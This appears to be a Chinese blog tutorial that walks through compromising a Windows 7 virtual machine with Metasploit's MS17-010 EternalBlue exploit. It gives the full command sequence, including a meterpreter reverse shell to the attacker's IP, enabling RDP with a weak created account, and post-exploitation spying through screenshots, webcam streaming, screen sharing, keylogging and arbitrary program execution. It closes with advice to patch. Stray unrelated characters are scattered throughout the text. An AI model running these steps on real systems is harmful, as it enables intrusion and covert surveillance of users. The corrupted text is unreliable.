現(xiàn)在很多用戶(hù)還在使用Win7系統(tǒng),雖然我個(gè)人也非常喜歡Win7攀涵,也承認(rèn)這是一款非常經(jīng)典的系統(tǒng)铣耘。但是Win7已經(jīng)在今年1月份徹底停止了支持,也就是說(shuō)永遠(yuǎn)也不會(huì)得到安全更新和補(bǔ)丁修復(fù)了以故。這對(duì)用戶(hù)來(lái)說(shuō)是極大的危險(xiǎn)蜗细,如果有條件的話,還是請(qǐng)使用最新版的Win10怒详,并及時(shí)更新安全補(bǔ)丁炉媒,保護(hù)電腦。
今天就來(lái)看看如何利用Kali來(lái)對(duì)Win7進(jìn)行滲透棘利。這里使用的工具是大名鼎鼎的Metaspoit橱野,集成了大量漏洞滲透工具。其中自然有臭名昭著的永恒之藍(lán)工具善玫,它利用了Windows系統(tǒng)的SMB漏洞水援, 漏洞編號(hào)是MS17-010密强。具體原理其實(shí)我也不清楚,但是大家只要知道這些漏洞非常危險(xiǎn)就可以了蜗元。
準(zhǔn)備工作
準(zhǔn)備工作很簡(jiǎn)單或渤,一個(gè)Win7虛擬機(jī)和一個(gè)Kali虛擬機(jī)即可。為了讓Kali能夠成功滲透奕扣,Win7系統(tǒng)需要關(guān)閉防火墻薪鹦。
掃描漏洞
首先在Kali里啟動(dòng)Metasploit框架。
msfconsole
啟動(dòng)成功之后惯豆,應(yīng)該會(huì)進(jìn)入Metasploit工具的命令行中池磁,提示符為msf5。
然后使用掃描工具掃描ms10-010漏洞楷兽,RHOSTS填寫(xiě)Win7虛擬機(jī)的IP地址地熄。
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.229.129
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
注意工具的運(yùn)行結(jié)果,如果出現(xiàn)了類(lèi)似綠框中的輸出芯杀,那么就說(shuō)明漏洞掃描成功端考,可以進(jìn)行下一步的滲透工作了。如果Win7防火墻是開(kāi)啟的揭厚,是無(wú)法掃描到漏洞的却特。這也從另一個(gè)側(cè)面來(lái)證明防火墻的保護(hù)作用。
滲透系統(tǒng)
通過(guò)掃描證實(shí)了Win7系統(tǒng)中存在漏洞筛圆,下一步自然是通過(guò)對(duì)應(yīng)的滲透工具進(jìn)行滲透裂明。其中RHOSTS是遠(yuǎn)程IP,也就是Win7的IP地址顽染,而LHOSTS是本地Kali系統(tǒng)的IP地址漾岳。
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.229.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.229.131
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
稍等片刻轰绵,如果滲透成功粉寞,那么就會(huì)出現(xiàn)meterpreter提示符。這時(shí)候可以輸入getuid
命令查看一下當(dāng)前系統(tǒng)的用戶(hù)左腔。
開(kāi)啟遠(yuǎn)程桌面
滲透成功之后唧垦,就可以使用隨心所欲的進(jìn)行各種操作了。如果想要簡(jiǎn)單一點(diǎn)液样,可以開(kāi)啟遠(yuǎn)程桌面振亮,直接控制目標(biāo)電腦。開(kāi)啟RDP的時(shí)候需要?jiǎng)?chuàng)建一個(gè)用戶(hù)鞭莽。
meterpreter > run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456
然后在Kali中打開(kāi)一個(gè)新的終端坊秸,輸入命令開(kāi)啟遠(yuǎn)程桌面。
rdesktop 192.168.229.129
然后輸入上面設(shè)置的用戶(hù)名和密碼即可連接到目標(biāo)計(jì)算機(jī)澎怒。
當(dāng)然褒搔,這種方法的問(wèn)題就是因?yàn)閃indows系統(tǒng)是單用戶(hù)的系統(tǒng),當(dāng)前登錄的用戶(hù)會(huì)看到遠(yuǎn)程桌面的登錄提示,從而暴露滲透者星瘾。
后臺(tái)監(jiān)聽(tīng)
其實(shí)如果滲透成功走孽,進(jìn)入了meterpreter提示符狀態(tài)的話,也不需要這么麻煩琳状。因?yàn)閙eterpreter自帶了很多命令磕瓷,包括上傳文件、執(zhí)行程序念逞、監(jiān)聽(tīng)鍵盤(pán)鼠標(biāo)攝像頭等等困食,完全足以獲取目標(biāo)用戶(hù)的任何信息。
screenshot命令可以獲取當(dāng)前的系統(tǒng)截圖翎承。
upload命令可以上傳文件陷舅,這里我直接把剛剛的屏幕截圖上傳上去了。上傳的目標(biāo)位置在C:\Windows\System32
里审洞。
webcam_stream命令可以打開(kāi)目標(biāo)計(jì)算機(jī)的攝像頭莱睁。
screenshare可以實(shí)時(shí)查看用戶(hù)的當(dāng)前屏幕內(nèi)容。
keyscan命令可以監(jiān)聽(tīng)用戶(hù)的鍵盤(pán)操作芒澜。
最后是execute命令可以執(zhí)行目標(biāo)計(jì)算機(jī)上的任意程序仰剿。
以上這些命令配合使用,即可完成整個(gè)滲透過(guò)程痴晦,從方方面面獲取目標(biāo)用戶(hù)的信息南吮。
當(dāng)然,通過(guò)本篇內(nèi)容誊酌,相比大家也明白了系統(tǒng)漏洞對(duì)用戶(hù)的危害有多大了吧部凑。為了盡可能的減少漏洞對(duì)我們的影響,我推薦大家永遠(yuǎn)使用最新版的操作系統(tǒng)并及時(shí)更新安全補(bǔ)丁碧浊,不要關(guān)閉更新和防火墻涂邀,安裝并確保殺毒軟件正常運(yùn)行,不運(yùn)行奇怪的程序箱锐。這樣可以很大程度上避免不法分子黑入我們的電腦比勉。